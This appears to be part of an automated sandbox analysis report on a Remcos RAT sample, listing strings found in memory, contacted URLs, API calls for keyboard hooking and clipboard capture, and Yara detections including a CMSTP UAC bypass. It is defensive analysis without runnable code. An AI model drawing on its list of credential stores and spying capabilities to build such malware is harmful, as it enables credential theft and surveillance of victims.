                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: antholite.exe, 00000003.00000003.2160163689.000000000172D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                  Source: antholite.exe, 00000003.00000003.2160163689.000000000172D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfms-settings:networkfile://192.168.2.1/all/install/setup.au3https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: antholite.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: antholite.exe, 00000002.00000002.4551692085.0000000006900000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: antholite.exe, 00000002.00000002.4551692085.0000000006900000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000003.00000002.2160545204.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertCloudServicesCA-1-g1.crl0?
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                  Source: antholite.exe, 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp)
                  Source: antholite.exe, 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpK
                  Source: antholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpM
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                  Source: antholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpu
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0H
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0I
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocsp.msocsp.com0S
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://ocspx.digicert.com0E
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://www.digicert.com/CPS0~
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2147465927.000000000116D000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: antholite.exe, 00000005.00000002.2147465927.000000000116D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comata
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhvA838.tmp.3.drString found in binary or memory: http://www.msftconnecttest.com/connecttest.txt?n=1696428304750
                  Source: antholite.exe, 00000003.00000002.2160954992.00000000011F4000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpX
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?77686a33b2eafa1538ef78c3be5a5910
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd-nocache.azureedge.net/apc/trans.gif?caa2cf97cacae25a18f577703684ee65
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?7e9591e308dbda599df1fc08720a72a3
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp-vp.azureedge.net/apc/trans.gif?c6a2869c584d2ea23c67c44abe1ec326
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://fp.msedge.net/conf/v1/asgw/fpconfig.min.json
                  Source: antholite.exe, 00000003.00000002.2160855466.0000000000A9C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://login.li
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                  Source: antholite.exeString found in binary or memory: https://login.yahoo.com/config/login
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://maps.windows.com/windows-app-web-link
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-04-14-10-35/PreSignInSettingsConfig.json
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/dfb21df16475d4e5b2b0ba41e6c4e842c100b150.xml?OneDriveUpdate=4954a0
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-0debb885be07c402c948.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ec3581b6c9e6e9985aa7.chunk.v7.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.6c288f9aff9797959103.chunk.v7.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.9ba2d4c9e339ba497e10.chunk.v7.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-1652fd8b358d589e6ec0.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.52c45571d19ede0a7005.chunk.v7.j
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.d918c7fc33e22b41b936.chunk.v7.c
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                  Source: antholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: antholite.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                  Source: bhvA838.tmp.3.drString found in binary or memory: https://www.office.com/

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,000000002_2_0040A2F3
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0077EAFF
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0077ED6A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalFix,GlobalUnWire,CloseClipboard,2_2_004168FC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0090ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_0090ED6A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,3_2_0040987A
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,3_2_004098E2
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_0090ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_0090ED6A
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0077EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0077EAFF
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0076AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0076AA57
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00799576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00799576
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00929576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,2_2_00929576
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 3_2_00929576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_00929576
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_0041CA73 SystemParametersInfoW,2_2_0041CA73

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
